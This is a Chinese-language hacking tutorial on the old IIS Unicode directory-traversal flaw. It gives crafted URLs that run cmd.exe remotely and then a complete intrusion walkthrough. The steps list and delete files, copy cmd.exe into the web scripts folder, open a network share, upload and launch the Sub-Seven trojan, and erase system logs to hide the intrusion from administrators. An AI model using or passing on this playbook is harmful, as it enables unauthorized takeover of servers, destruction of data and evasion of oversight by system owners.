2001年4月开始，中美黑客又一次在网络上展开了没有硝烟的战斗，这次黑客攻击主要是依靠UNICODE漏洞，利用这个漏洞黑客可以远程调用服务器的cmd命令解释器，对服务器磁盘进行各种操作，配合上传的木马等程序，这个漏洞载当时给互联网带来的威胁是巨大的。
    1、UNICODE原理：
    此漏洞从中文IIS4.0+SP6开始出现，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。UNICODE是一种编码格式，它可以用两组代码编制一个字符，例如下面在中文Windows2000中的编码规则就是黑客需要利用到的：
        %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
        %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
    黑客利用“%c1%1c”和“%c0%2f”两个不完整的编码，通过系统转换可以得到正、反斜杠，这样就可以访问远程服务器上的为开放的目录内容了。例如对于http://www.acc.com/来说，它的webroot目录如果是c:\webroot\，那么当黑客使用http://www.acc.com/scripts/..%c1%1c../winnt/system32/cmd.exe实际上被编码之后是：http://www.acc.com/scripts/../../winnt/system32/cmd.exe，也就是说黑客直接通过浏览器就调用了服务器上的cmd命令解释器，获得了远程执行命令的权限。
    2、检测方法：
    如果怀疑某个网站存在这个程序，可以通过下面的方法进行检测：
    http://www.acc.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
    如果系统的确存在漏洞的话，那么浏览器返回的内容将会是对方系统的硬盘目录内容，注意因为UNICODE在不同的系统中有不同的编码，所以不能依靠一组代码确定服务器上不存在这个漏洞。这个时候扫描器就派上了大用场，使用xscanner可以专门对多个UNICODE进行检测，它的使用参数是“-iis”。
    3、分析漏洞：
    获得了控制台命令的执行权限，就意味着黑客可以执行dir、copy、echo、net等多个命令，也就是说黑客可以浏览、删除服务器硬盘上的文件，还可以使用net命令打开服务器的某个目录的共享状态，然后上传木马并继续使用控制台命令调用木马。
    例如http://www.acc.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\game可以使用dir命令列出服务器的c:\game目录中（如果有的话）的文件列表，将“/c+dir+”更改成“/c+del+”既可以删除后面指定的文件了。
    4、完整利用：
    现在假设学习者手中拥有sub-seven木马和一台已经确认具有UNICODE漏洞的服务器，之后所要做的事情就是单纯的利用浏览器和木马程序就可以完全控制服务器了。
    首先利用扫描器找到一台具有IISCODE漏洞的服务器（例如http://www.bnc.org/），然后通过浏览器完成下面的工作：
    http://www.bnc.org/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
    这样可以通过漏洞看到硬盘上的文件列表，地址行中的“..%c1%1c..”在不同的系统中可能不同，它的意思是经过UNICODE编码转变成符号“../..”，如果看到了文件列表说明漏洞的确存在，之后将cmd.exe文件复制到scripts目录下：
    /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\webroot\scripts\abc.exe
    这样就将cmd.exe程序保存到scripts/目录下，并且将它的文件名更改为abc.exe，如果不更改名称，系统将不会在其他目录中运行cmd.exe。这之后可以用/scripts/abc.exe?/c+dir+c:\game等形式直接调用cmd.exe命令。
    使用cmd.exe配合net命令可以在对方的系统上开辟一个共享目录，这个目录可以设置为整个驱动器，有关net use的介绍已经在第二章中提到，在这里不再过多做解释。开辟了共享目录后，既可以通过“网上邻居”直接连接到对方的系统上\\www.bnc.org\，之后上传木马程序sub-seven的服务端到scripts下。
    最后调用并激活木马程序/scripts/sub-seven.exe，这样所有入侵工作全部完成了。之后在本地电脑上运行sub-seven的客户端程序，并在IP地址内输入对方的IP，控制对方系统。进入系统之后，要注意删除c:\winnt\log下的日志文件，这样系统管理员就不会发现此次入侵活动了。